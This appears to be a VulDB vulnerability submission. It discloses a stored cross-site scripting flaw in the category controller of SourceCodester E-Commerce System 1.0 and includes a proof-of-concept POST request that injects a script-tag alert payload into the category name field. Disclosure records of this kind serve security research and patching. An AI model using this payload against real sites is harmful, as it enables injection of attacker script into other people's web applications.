| Title | E-Commerce System category XSS |
|---|
| Description | E-Commerce System has a XSS vulnerability at /ecommerce/admin/category/controller.php,attackers can edit the category name with a xss payload , and it will be triggered when viewing the page /ecommerce/admin/category/index.php.
POC request below:
POST /ecommerce/admin/category/controller.php?action=edit HTTP/1.1
********************************
CATEGID=5&CATEGORY=SHOES%3Cscript%3Ealert%28%271%27%29%3C%2Fscript%3E&save= |
|---|
| Source | ⚠️ https://www.sourcecodester.com/php/13524/e-commerce-system-using-phpmysqli.html |
|---|
| User | WWesleywww (UID 43117) |
|---|
| Submission | 03/20/2023 07:59 (3 years ago) |
|---|
| Moderation | 03/20/2023 08:33 (34 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 223411 [SourceCodester E-Commerce System 1.0 Category Name controller.php cross site scripting] |
|---|
| Points | 19 |
|---|